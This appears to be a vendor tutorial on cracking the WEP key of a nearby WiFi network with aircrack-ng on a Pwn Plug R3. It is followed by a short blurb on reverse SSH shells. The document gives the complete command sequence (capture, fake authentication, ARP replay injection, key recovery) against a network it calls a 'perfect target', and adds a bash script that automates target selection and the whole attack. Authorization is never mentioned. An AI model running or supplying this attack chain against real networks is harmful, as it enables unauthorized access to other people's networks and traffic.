It’s common knowledge that Wired Equivalent Privacy (WEP) is a completely broken form of WiFi security, but not everyone knows just how trivial it can be to defeat with a properly configured appliance such as the Pwn Plug R3. Not only is the R3 ready to go with the latest versions of all the required software, it’s also equipped with a high performance injection-capable wireless chipset and enough processing power to easily crunch the target network’s key.

Finding a Target

To start, we’ll put the R3’s internal WiFi radio into monitor mode, and see what networks are operating in the area. Running the following commands will set up the hardware and show a list of networks and their pertinent information (the first creates the monitor interface, the second lists every network the radio can hear):

airmon-ng start wlan0

airodump-ng mon0

Note: newer releases of the aircrack-ng suite name the monitor interface wlan0mon rather than mon0. Use whichever name airmon-ng reports, and substitute it for mon0 in the commands that follow.

You’ll be presented with a screen that will look something like this:

WEP Cracking

Here we can see we have a perfect target, a network named “linksys” on channel 6 which is running WEP encryption and has a nice strong signal.

Capturing Data

The next step is to use airodump-ng to capture data from the network, which we’ll eventually use to crack the WEP key. Plug the channel and BSSID (the AP’s MAC address) from the airodump-ng listing into a second airodump-ng run that locks on to the target and writes everything it captures to disk:

airodump-ng -c <CHANNEL> -w <LOGFILE> --bssid <AP MAC> mon0

So the command to start dumping data from our “linksys” network would be:

airodump-ng -c 6 -w linksys --bssid 00:23:69:48:33:95 mon0

The resulting display will show clients connected to the network, as well as how much data is actually moving through the air:

WEP 2

Not much is happening on this network right now, but using packet injection, we’ll soon change that.

Note: Keep airodump-ng running in the background while performing the next steps.

Packet Injection

Circumventing WEP requires a large number of encrypted packets, specifically packets carrying distinct initialization vectors (IVs), to be captured from the network so there’s enough information to recover the key. Under normal circumstances this would mean an attacker would need to wait around and capture data as it’s sent out by the network in the course of normal operation. The key to cracking WEP quickly is using packet injection to force the network to send far more data than it normally would.

The first step is to associate the R3 with the target network (a “fake authentication”; an access point silently discards frames from stations that are not associated, so without this step the injected packets would go nowhere). This can be done with the following command:

aireplay-ng -1 0 -a 00:23:69:48:33:95 mon0

Which will give you the following output:

WEP 3

 

This command will throw up a few lines, but the only one you need to look for is the final one. If it ends in a little smiley face (“Association successful :-)”), you’re good to go. If the association fails, retry with -e to supply the network’s ESSID and -h to supply the MAC address of the monitor interface.

Finally, we’ll use another aireplay-ng command to start flooding the network with data, which will be captured by the airodump-ng instance we’ve been running in the background. Attack mode -3 is the ARP request replay: aireplay-ng waits for an ARP request from a connected client, then retransmits it to the access point over and over, and every reply the AP sends carries a fresh IV.

aireplay-ng -3 -b 00:23:69:48:33:95 mon0

Keep an eye on the last line of aireplay-ng’s output to see the attack progressing. If the packet count stays at zero, no client is generating ARP traffic; on a quiet network this can take a few minutes to get started.

WEP 4

Cracking the Key

With data pouring into the Pwn Plug, there’s only one thing left: use aircrack-ng against the growing capture file to crack the WEP key. By running aircrack-ng against the capture file as it’s being filled by airodump-ng, the process will continue until the necessary amount of data is collected (which varies from network to network). The PTW method aircrack-ng uses by default typically succeeds with a few tens of thousands of unique IVs; when a first attempt fails, aircrack-ng automatically retries once another 5,000 IVs have arrived.

Simply give aircrack-ng the name of the log file you specified when running airodump-ng:

aircrack-ng linksys-01.cap

A few seconds later, you should see the cracked WEP key ready for use:

WEP 5

In practice, it will probably take longer to read the steps involved in cracking WEP than it does to actually recover the key. With the processing power and WiFi chipset in the Pwn Plug R3, going from target acquisition to recovered key can be done within a minute.
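The four steps above can be driven from one script. The following is an added example, not code from the original post or from Pwnie Express: it reads the CSV log that airodump-ng writes next to its .cap file (with -w linksys you get linksys-01.csv as well as linksys-01.cap) to pick WEP targets out of the survey and to wait until enough unique IVs are on disk before starting aircrack-ng, instead of re-running aircrack-ng against a growing file. The monitor interface name, the 40000-IV threshold (a conservative figure for PTW against a 128-bit key) and the sample survey data are assumptions; only the linksys BSSID is taken from the post.

```shell
#!/usr/bin/env bash
# Added example; not part of the original post or the Pwnie Express tooling.
# Assumptions: aircrack-ng suite installed, run as root, monitor interface
# named as airmon-ng reports it (mon0 or wlan0mon), 40000-IV threshold.
set -eu

# airodump-ng CSV layout, access-point section (one AP per line):
# BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher,
# Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
# The client section follows, starting with a line that begins "Station MAC".
# Fields are comma separated with variable padding, hence the FS regex.

# Print "BSSID CHANNEL ESSID" for every WEP AP heard at or above MIN_POWER dBm.
wep_targets() {
    csv="$1"; min_power="${2:--75}"
    awk -F' *, *' -v minp="$min_power" '
        /^Station MAC/ { exit }
        $6 == "WEP" && ($9 + 0) >= (minp + 0) { print $1, $4, $14 }
    ' "$csv"
}

# Unique IV count airodump-ng has logged so far for one BSSID (0 if unseen).
iv_count() {
    csv="$1"; bssid="$2"
    awk -F' *, *' -v b="$bssid" '
        /^Station MAC/ { exit }
        $1 == b { print $11 + 0; found = 1; exit }
        END { if (!found) print 0 }
    ' "$csv"
}

# The full chain from the post against one target, paced by the IV count.
crack_wep() {
    iface="$1"; bssid="$2"; channel="$3"; prefix="$4"; need_ivs="${5:-40000}"
    airodump-ng -c "$channel" -w "$prefix" --bssid "$bssid" "$iface" >/dev/null 2>&1 &
    dump_pid=$!
    sleep 3                                    # let the capture files appear
    aireplay-ng -1 0 -a "$bssid" "$iface"      # fake authentication
    aireplay-ng -3 -b "$bssid" "$iface" >/dev/null 2>&1 &   # ARP request replay
    replay_pid=$!
    while [ "$(iv_count "${prefix}-01.csv" "$bssid")" -lt "$need_ivs" ]; do
        sleep 5
    done
    kill "$replay_pid" "$dump_pid"
    aircrack-ng "${prefix}-01.cap"
}

# Constructed sample of an airodump-ng survey CSV. The linksys BSSID is the one
# from the post; the other two APs and the client are made up for the example.
SAMPLE_CSV="$(mktemp)"
cat > "$SAMPLE_CSV" <<'EOF'
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:23:69:48:33:95, 2014-10-21 10:00:00, 2014-10-21 10:05:00,  6,  54, WEP , WEP,   , -38,      120,     3120,   0.  0.  0.  0,   7, linksys,
00:1A:2B:3C:4D:5E, 2014-10-21 10:00:00, 2014-10-21 10:05:00, 11,  54, WPA2, CCMP, PSK, -52,       80,        0,   0.  0.  0.  0,   9, CoffeeNet,
00:11:22:33:44:55, 2014-10-21 10:00:00, 2014-10-21 10:05:00,  1,  54, WEP , WEP,   , -89,       10,       12,   0.  0.  0.  0,   7, faraway,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:01, 2014-10-21 10:01:00, 2014-10-21 10:05:00, -40,      900, 00:23:69:48:33:95,
EOF

wep_targets "$SAMPLE_CSV" -75               # prints: 00:23:69:48:33:95 6 linksys
iv_count "$SAMPLE_CSV" 00:23:69:48:33:95    # prints: 3120
# Live use on the R3 (not run here): crack_wep mon0 00:23:69:48:33:95 6 linksys
```

The power threshold matters in practice: a WEP network at -89 dBm is a poor target because the fake authentication and replay both need the AP to hear the sensor, so the script drops it unless you lower the threshold.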

 

Standard Reverse SSH

Next in our how-to Pwnie is a tutorial in how to set up a standard reverse SSH connection. In order to get past firewalls and communicate directly with a Pwn Pro sensor located in a remote location, a reverse SSH connection must be set up. This demonstration will be using a Pwn Pro, though any Pwn Appliance or Pwn Plug will work. The video guides you through specifying the Kali Linux connection and setting up various types of reverse shells (standard, reverse over DHS, etc). All you need to do is supply a DNS resolvable name and a port number. The guide then continues to describe the different types of SSH and which may be most useful for your use case. The tutorial also explains how you can add a second SSH receiver. And be sure to watch the video! A contest featuring this video will be going up on our weekly promotions page soon.